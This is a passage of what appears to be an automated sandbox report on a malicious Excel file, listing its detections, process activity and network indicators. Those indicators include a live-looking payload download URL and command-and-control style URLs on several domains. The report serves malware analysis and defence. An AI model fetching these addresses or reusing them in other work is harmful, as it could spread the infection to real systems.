29->81 35 cmd.exe 29->35         started        45 www.hfjxhs.com 156.241.53.161, 49168, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 32->45 47 www.cyrilgraze.com 104.21.65.7, 49172, 80 CLOUDFLARENETUS United States 32->47 49 8 other IPs or domains 32->49 83 System process connects to network (likely due to code injection or exploit) 32->83 85 Performs DNS queries to domains with low reputation 32->85 37 autofmt.exe 32->37         started        signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          APPROVED.xlsx21%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.essentiallyourscandles.com/p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P0%Avira URL Cloudsafe
          http://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/dicas-para-noivas/0%Avira URL Cloudsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO0%Avira URL Cloudsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://3.36.53.50/dose/xele.exe0%Avira URL Cloudsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          https://www.casar.com/assunto/organizacao/0%Avira URL Cloudsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          https://www.casar.com0%Avira URL Cloudsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.brunoecatarina.com
          54.85.86.211
          truetrue
            unknown
            www.myfavbutik.com
            104.21.15.16
            truefalse
              unknown
              www.hfjxhs.com
              156.241.53.161
              truetrue
                unknown
                www.cyrilgraze.com
                104.21.65.7
                truetrue
                  unknown
                  shops.myshopify.com
                  23.227.38.74
                  truetrue
                    unknown
                    ytptranspx.xshoppy.shop
                    75.2.66.247
                    truetrue
                      unknown
                      www.zmzcrossrt.xyz
                      unknown
                      unknowntrue
                        unknown
                        www.zgcbw.net
                        unknown
                        unknowntrue
                          unknown
                          www.essentiallyourscandles.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.essentiallyourscandles.com/p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2Ptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2Ptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://3.36.53.50/dose/xele.exetrue
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://search.chol.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.mercadolivre.com.br/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://search.ebay.de/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.mtv.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.rambler.ru/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.nifty.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.dailymail.co.uk/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://buscar.ya.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sogou.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://asp.usatoday.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://fr.search.yahoo.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://rover.ebay.comexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://in.search.yahoo.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://search.ebay.in/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://casarpontocom.zendesk.com/hc/pt-brexplorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://www.casar.com/assunto/noivas/dicas-para-noivas/explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://%s.comexplorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            low
                                                            http://msk.afisha.ru/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2152979155.0000000002331000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.rediff.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.windows.com/pctv.explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.naver.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.google.ru/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.daum.net/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://buscar.ozu.es/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://kr.search.yahoo.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.about.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://busca.igbusca.com.br/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.ask.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.cjmall.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.centrum.cz/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://suche.t-online.de/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.google.it/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://search.auction.co.kr/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.ceneo.pl/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.amazon.de/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000009.00000000.2170312578.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://sads.myspace.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JOexplorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.jsexplorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://google.pchome.com.tw/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://search.sify.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://search.ebay.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://search.nifty.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://www.casar.com/assunto/organizacao/explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.google.si/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.google.cz/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.soso.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.univision.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.ebay.it/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://busca.orange.es/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.target.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://buscador.terra.es/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.casar.comexplorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.iask.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.tesco.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.interpark.com/explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        3.36.53.50
                                                                                                                                                        unknownUnited States
                                                                                                                                                        8987AMAZONEXPANSIONGBtrue
                                                                                                                                                        104.21.65.7
                                                                                                                                                        www.cyrilgraze.comUnited States
                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                        75.2.66.247
                                                                                                                                                        ytptranspx.xshoppy.shopUnited States
                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                        54.85.86.211
                                                                                                                                                        www.brunoecatarina.comUnited States
                                                                                                                                                        14618AMAZON-AESUStrue
                                                                                                                                                        156.241.53.161
                                                                                                                                                        www.hfjxhs.comSeychelles
                                                                                                                                                        136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                                                                                        23.227.38.74
                                                                                                                                                        shops.myshopify.comCanada
                                                                                                                                                        13335CLOUDFLARENETUStrue

                                                                                                                                                        Private

                                                                                                                                                        IP
                                                                                                                                                        192.168.2.255

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                        Analysis ID:413096
                                                                                                                                                        Start date:13.05.2021
                                                                                                                                                        Start time:08:28:18
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 12m 31s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:APPROVED.xlsx
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSX@17/7@7/7
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 25.6% (good quality ratio 24.2%)
                                                                                                                                                        • Quality average: 72.6%
                                                                                                                                                        • Quality standard deviation: 28.4%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xlsx
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                        • TCP Packets have been reduced to 100
